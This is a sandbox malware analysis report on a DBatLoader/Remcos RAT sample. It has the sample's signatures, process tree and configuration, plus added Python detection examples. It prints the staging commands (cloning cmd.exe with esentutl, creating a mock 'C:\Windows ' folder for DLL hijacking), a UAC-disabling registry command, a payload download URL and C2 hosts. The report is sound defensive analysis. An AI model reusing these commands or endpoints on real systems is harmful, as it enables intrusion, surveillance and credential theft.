Windows Analysis Report
jW3NEKvxH1.exe

Overview

General Information

Sample name: jW3NEKvxH1.exe (renamed because the original name is a hash value)
Original sample name: e4696be1368f7ac260c605c7b4f7eeaf.exe
Analysis ID: 1569880
MD5: e4696be1368f7ac260c605c7b4f7eeaf
SHA1: d73a7226926b44f66d94ff7b229ef8243976eb6d
SHA256: 592624f30b177058eba9b5b36e2e72bea42af95bf1552ca9a9ca28c4e1e6cfeb
Tags: exe, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • jW3NEKvxH1.exe (PID: 616 cmdline: "C:\Users\user\Desktop\jW3NEKvxH1.exe" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • cmd.exe (PID: 5948 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 5852 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 3840 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 2996 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2800 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 3968 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5988 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 5280 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6404 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 4136 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 2356 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SndVol.exe (PID: 4576 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Dlaybpxl.PIF (PID: 3604 cmdline: "C:\Users\Public\Libraries\Dlaybpxl.PIF" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • SndVol.exe (PID: 3648 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Dlaybpxl.PIF (PID: 6112 cmdline: "C:\Users\Public\Libraries\Dlaybpxl.PIF" MD5: E4696BE1368F7AC260C605C7B4F7EEAF)
    • colorcpl.exe (PID: 2680 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
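The tree above is the DBatLoader staging chain rather than anything Remcos-specific: the dropped batch file lxpbyalD.cmd runs esentutl /y to clone cmd.exe and ping.exe into C:\Users\Public as alpha.pif and xpha.pif (the "drops or copies cmd.exe with a different name" signature), the cloned cmd.exe creates a mock trusted directory "C:\Windows " with a trailing space, and NETUTILS.dll is then written into "C:\Windows \SysWOW64" (the file-creation event in the System Summary section). The trailing space survives only because of the \\?\ prefix, since normal Win32 path handling strips it; a directory named that way is the standard trick for getting an auto-elevating Windows binary to load a planted DLL from what looks like the real system directory. The Python below is an added example, not part of the Joe Sandbox report, that turns those three observations into triage rules over process-creation and file-creation records; the record schema (event, pid, cmdline, target) is an assumption and the sample records are constructed from the command lines in the tree.

```python
# Added example (not part of the Joe Sandbox report): triage rules for the
# DBatLoader staging pattern in the process tree. The event schema
# ('event', 'pid', 'cmdline', 'target') is an assumption; the sample records
# are constructed from the command lines the report shows.
import re

# esentutl /y <src> /d <dst> /o  -- the copy verb abused to clone system binaries
_ESENTUTL_COPY = re.compile(r'(?i)esentutl(?:\.exe)?\s+/y\s+"?([^"\s]+)"?\s+/d\s+"?([^"\s]+)"?\s+/o')
# a .pif started from C:\Users\Public or a subfolder, quoted or not
_PUBLIC_PIF = re.compile(r'(?i)^"?c:\\users\\public\\[^"]+?\.pif"?(?:\s|$)')
# quoted arguments; the closing quote is optional because the stager's rmdir
# lines omit it and cmd.exe accepts that
_QUOTED = re.compile(r'"([^"]*)"?')


def normalize(text):
    # The .cmd stager emits doubled backslashes (C:\\Users\\Public\\alpha.pif);
    # CreateProcess tolerates them, naive string matching does not. The \\?\
    # prefix becomes \?\, which does not matter for these checks.
    return text.replace('\\\\', '\\')


def space_components(path):
    # Path components ending in whitespace, e.g. 'Windows ' in
    # C:\Windows \SysWOW64\NETUTILS.dll. Win32 path normalisation strips a
    # trailing space, so such a folder can only be created via the \\?\ prefix.
    return [c for c in normalize(path).split('\\') if c.strip() and c != c.rstrip()]


def mock_dirs_in_cmdline(cmdline):
    # Only a quoted argument can carry a trailing-space component through cmd.exe.
    found = []
    for arg in _QUOTED.findall(normalize(cmdline)):
        if '\\' in arg:
            found.extend(space_components(arg))
    return found


def esentutl_copy(cmdline):
    # Returns (src, dst, reasons) for an esentutl copy, or None.
    m = _ESENTUTL_COPY.search(normalize(cmdline))
    if not m:
        return None
    src, dst = m.group(1).lower(), m.group(2).lower()
    reasons = []
    if '\\windows\\system32\\' in src:
        reasons.append('system32-source')        # a system binary being cloned
    if dst.startswith('c:\\users\\public\\'):
        reasons.append('public-destination')     # world-writable staging folder
    if src.rsplit('.', 1)[-1] != dst.rsplit('.', 1)[-1]:
        reasons.append('extension-changed')      # cmd.exe -> alpha.pif
    return src, dst, reasons


def public_pif_execution(cmdline):
    return _PUBLIC_PIF.match(normalize(cmdline)) is not None


def triage(events):
    findings = []
    for ev in events:
        if ev['event'] == 'file':
            if space_components(ev['target']):
                findings.append((ev['pid'], 'space-in-path', ev['target']))
            continue
        cl = ev['cmdline']
        copy = esentutl_copy(cl)
        if copy and copy[2]:
            findings.append((ev['pid'], 'esentutl-copy:' + ','.join(copy[2]),
                             copy[0] + ' -> ' + copy[1]))
        for comp in mock_dirs_in_cmdline(cl):
            findings.append((ev['pid'], 'space-in-path', comp))
        if public_pif_execution(cl):
            findings.append((ev['pid'], 'public-pif-exec', cl))
    return findings


# Constructed from the report's process tree and its NETUTILS.dll file-creation event.
EVENTS = [
    {'event': 'process', 'pid': 5948, 'cmdline': r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "'},
    {'event': 'process', 'pid': 5852, 'cmdline': r'C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o'},
    {'event': 'process', 'pid': 3840, 'cmdline': r'C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o'},
    {'event': 'process', 'pid': 2996, 'cmdline': r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "'},
    {'event': 'process', 'pid': 2800, 'cmdline': r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'},
    {'event': 'process', 'pid': 5988, 'cmdline': r'C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10'},
    {'event': 'process', 'pid': 6404, 'cmdline': r'C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64'},
    {'event': 'process', 'pid': 2356, 'cmdline': r'C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o'},
    {'event': 'process', 'pid': 3640, 'cmdline': r'C:\Windows\system32\conhost.exe 0xffffffff -ForceV1'},
    {'event': 'file', 'pid': 616, 'target': r'C:\Windows \SysWOW64\NETUTILS.dll'},
]

if __name__ == '__main__':
    for pid, kind, detail in triage(EVENTS):
        print(pid, kind, detail)
```

The conhost.exe and the parent cmd.exe lines produce nothing, which is the point of keying on the quoted argument rather than on any space before a backslash: a legitimate "C:\Program Files\..." argument has its space in the middle of a component, not at its end. The xpha.pif copy of ping.exe (the `127.0.0.1 -n 10` call) is a sleep, and the stager deletes its helpers and the mock directory afterwards, so the file-creation event is the artefact most likely to survive on a real host.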
Malware family: Remcos (RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware family: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Extracted DBatLoader configuration:
{"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}
Extracted Remcos configuration:
{"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
  (40 string matches in total; the first 21 are listed above)
Source | Rule | Description | Author | Strings
19.2.SndVol.exe.2940000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
19.2.SndVol.exe.2940000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
19.2.SndVol.exe.2940000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
19.2.SndVol.exe.2940000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
19.2.SndVol.exe.2940000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
  (37 string matches in total; the first 21 are listed above)

              System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5948, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2996, ProcessName: alpha.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Dlaybpxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Dlaybpxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW3NEKvxH1.exe, ProcessId: 616, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5948, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 2996, ProcessName: alpha.pif

              Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: AC 70 73 C2 29 A5 77 CA 2A 18 05 44 B7 8F 28 C4 C7 62 0A F1 A2 6B 9B 61 5A 55 D5 51 05 C8 67 BE 32 59 27 CA 5B AA F2 FE 55 EE C9 04 48 39 E9 42 0E 44 B4 21 63 48 7B 72 C7 F1 D4 75 D2 D1 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\SndVol.exe, ProcessId: 4576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-RX8VCL\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T11:04:36.837037+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49716 | 185.166.143.50 | 443 | TCP
2024-12-06T11:04:39.532643+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49718 | 3.5.30.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T11:04:28.472775+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50033 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:05:08.868641+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49730 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:05:31.035427+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49785 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:05:54.067255+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49856 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:06:16.114807+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49914 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:06:39.162175+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49967 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:01.193957+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50018 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:24.260479+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50028 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:07:46.319799+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50030 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:08:09.367055+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50031 | 104.243.42.254 | 5874 | TCP
2024-12-06T11:08:31.397225+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50032 | 104.243.42.254 | 5874 | TCP
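The extracted Remcos configuration near the top of the report, together with the registry and Suricata rows in this section, gives a small set of host and network indicators: two C2 hostnames on port 5874, the mutex Rmc-RX8VCL, the HKCU\SOFTWARE\Rmc-RX8VCL\exepath value the report shows SndVol.exe writing (the mutex name reused as the settings key), and a Run value pointing at C:\Users\Public\Dlaybpxl.url. The Python below is an added example, not part of the Joe Sandbox report, that turns the configuration into IOCs and checks them against telemetry records modelled on this report's data; the record schema is an assumption, the DNS-query record is constructed because the report lists no DNS resolution for the configured hostnames, and the configuration is trimmed to the keys the example uses.

```python
# Added example (not part of the Joe Sandbox report): derive IOCs from the
# extracted Remcos configuration and match them against telemetry records.
# The record schema is an assumption; the DNS record is constructed.
import re

# Subset of the configuration the report's extractor produced (unused keys omitted).
REMCOS_CONFIG = {
    "Host:Port:Password": ["zara.master-workdone.com.ua:5874:1",
                           "manazara.master-workdone.com.ua:5874:1"],
    "Mutex": "Rmc-RX8VCL",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
}

_RUN_KEY = re.compile(r'\\software\\microsoft\\windows\\currentversion\\run\\')
_PUBLIC_PATH = re.compile(r'(?i)^"?c:\\users\\public\\')


def parse_c2(config):
    # Each entry is host:port:password; rsplit from the right keeps a host
    # that itself contains ':' intact.
    out = []
    for entry in config["Host:Port:Password"]:
        host, port, password = entry.rsplit(':', 2)
        out.append((host.lower(), int(port), password))
    return out


def build_iocs(config):
    c2 = parse_c2(config)
    return {
        'c2_hosts': {h for h, _, _ in c2},
        'c2_ports': {p for _, p, _ in c2},
        'mutex': config['Mutex'],
        # The report shows the mutex name reused as the per-user settings key
        # (HKCU\SOFTWARE\Rmc-RX8VCL\exepath), so the key is derived from the config.
        'settings_key': 'HKEY_CURRENT_USER\\SOFTWARE\\' + config['Mutex'],
        'run_keys': [k for k in ('Setup HKCU\\Run', 'Setup HKLM\\Run')
                     if config.get(k) == 'Enable'],
    }


def match_telemetry(iocs, records):
    hits = []
    for r in records:
        if r['type'] == 'net':
            # Port-only match: weak alone, strong alongside a DNS hit for a C2 host.
            if r['proto'] == 'TCP' and r['dport'] in iocs['c2_ports']:
                hits.append((r['pid'], 'c2-port', r['dst'] + ':' + str(r['dport'])))
        elif r['type'] == 'dns':
            if r['query'].lower() in iocs['c2_hosts']:
                hits.append((r['pid'], 'c2-host', r['query']))
        elif r['type'] == 'reg':
            key = r['key'].lower()
            if key.startswith(iocs['settings_key'].lower() + '\\'):
                hits.append((r['pid'], 'remcos-settings-key', r['key']))
            elif _RUN_KEY.search(key) and _PUBLIC_PATH.match(r['value']):
                hits.append((r['pid'], 'run-key-public-folder', r['value']))
    return hits


# Constructed records modelled on this report; pids on network rows are not
# attributed in the report, and the DNS row is constructed outright.
TELEMETRY = [
    {'type': 'net', 'pid': None, 'src': '192.168.2.6', 'sport': 50033,
     'dst': '104.243.42.254', 'dport': 5874, 'proto': 'TCP'},
    {'type': 'net', 'pid': None, 'src': '192.168.2.6', 'sport': 49716,
     'dst': '185.166.143.50', 'dport': 443, 'proto': 'TCP'},
    {'type': 'dns', 'pid': 4576, 'query': 'zara.master-workdone.com.ua'},
    {'type': 'reg', 'pid': 4576, 'key': r'HKEY_CURRENT_USER\SOFTWARE\Rmc-RX8VCL\exepath',
     'value': 'AC 70 73 C2 29 A5 77 CA (truncated)'},
    {'type': 'reg', 'pid': 616,
     'key': r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dlaybpxl',
     'value': r'C:\Users\Public\Dlaybpxl.url'},
]

if __name__ == '__main__':
    for pid, kind, detail in match_telemetry(build_iocs(REMCOS_CONFIG), TELEMETRY):
        print(pid, kind, detail)
```

The sandbox traffic reaches 104.243.42.254 on the configured port, but the report itself does not tie that address to either hostname, so the example keeps host and port as separate indicators rather than hard-coding the IP; on a real host, pair the port hit with a DNS or TLS SNI record before escalating. Note that the Run value belongs to the DBatLoader stage (written by jW3NEKvxH1.exe, PID 616), while the settings key is written by the Remcos payload running inside SndVol.exe (PID 4576).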


              AV Detection

Source: jW3NEKvxH1.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/165_Dlaybpxloke"]}
Source: 00000006.00000002.4603655140.0000000000607000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["zara.master-workdone.com.ua:5874:1", "manazara.master-workdone.com.ua:5874:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RX8VCL", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\Public\Libraries\Dlaybpxl.PIF | ReversingLabs: Detection: 55%
Source: jW3NEKvxH1.exe | ReversingLabs: Detection: 55%
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPE
